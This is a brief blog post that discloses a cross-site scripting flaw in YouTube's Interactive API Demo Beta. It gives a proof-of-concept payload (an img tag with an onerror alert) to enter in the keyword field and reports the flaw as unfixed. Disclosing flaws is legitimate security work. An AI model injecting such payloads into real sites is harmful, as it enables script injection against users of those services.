Search This Blog

Interactive YouTube API Demo Beta Vulnerable to XSS(Cross Site Scripting)


Some white hat hacker named as "Vansh Sharma" discovered the XSS vulnerability in Interactive YouTube API Demo Beta .

The keyword field is vulnerable to XSS .

Proof:
  • Open http://gdata.youtube.com/
  • Enter script
    <img src="<img src=search"/onerror=alert("xss")//">
    in the keyword area.
  • Press ADD
Vulnerability Status:
  • Type: XSS
  • organization: Youtube.com
  • Status: UnFixed
    Share it:

    Vulnerability

    Web Application Vulnerability

    XSS Vulnerability

    Youtube Hacks